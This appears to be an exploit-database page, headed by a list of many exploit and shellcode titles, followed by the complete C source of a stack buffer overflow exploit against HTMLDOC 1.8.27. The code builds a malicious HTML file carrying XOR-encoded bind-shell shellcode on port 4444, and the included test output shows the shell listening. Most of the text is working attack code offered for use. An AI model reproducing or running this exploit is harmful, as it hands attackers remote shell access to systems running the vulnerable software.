880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
81 lines
No EOL
2.3 KiB
C
81 lines
No EOL
2.3 KiB
C
/*
|
|
|
|
HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux)
|
|
Reference: https://www.securityfocus.com/bid/35727
|
|
|
|
Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR)
|
|
Credit: ANTHRAX666 for finding the vulnerability
|
|
|
|
Coded by Pankaj Kohli
|
|
http://www.pank4j.com
|
|
|
|
pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space
|
|
2
|
|
pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f
|
|
pankaj@zion:~/test/htmldoc$ ./htmldocb0f
|
|
|
|
[*] Creating buffer
|
|
[*] Exploit file written to sploit.html
|
|
Run as: htmldoc -f somefile.pdf sploit.html
|
|
|
|
pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
|
|
pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html &
|
|
[1] 3287
|
|
pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
|
|
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
|
|
/* Port binding (xor encoded) shellcode (port 4444) */
|
|
char code[] =
|
|
"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34"
|
|
"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
|
|
"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f"
|
|
"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
|
|
"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f"
|
|
"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
|
|
"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e"
|
|
"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
|
|
"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c"
|
|
"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
|
|
"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d"
|
|
"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
|
|
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff"
|
|
"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
|
|
"\xd3\x9e";
|
|
|
|
long jmp = 0x0804d938; // push esp; ret 0x0807; ;-)
|
|
|
|
int main(int argc, char **argv, char **envp) {
|
|
char buff[512];
|
|
int i;
|
|
FILE *fd;
|
|
|
|
printf("\n[*] Creating buffer\n");
|
|
strcpy(buff, "<!-- MEDIA SIZE 1x1");
|
|
for(i=0; i<275; i++) {
|
|
buff[19+i] = 'A';
|
|
}
|
|
|
|
buff[294] = jmp & 0x000000ff;
|
|
buff[295] = (jmp & 0x0000ff00) >> 8;
|
|
buff[296] = (jmp & 0x00ff0000) >> 16;
|
|
buff[297] = (jmp & 0xff000000) >> 24;
|
|
buff[298] = 0;
|
|
|
|
strcat(buff, code);
|
|
|
|
fd = fopen("sploit.html", "wb");
|
|
fprintf(fd, "%s", buff);
|
|
fclose(fd);
|
|
printf("[*] Exploit file written to sploit.html\n");
|
|
printf("Run as: htmldoc -f somefile.pdf sploit.html\n\n");
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2009-09-09]
|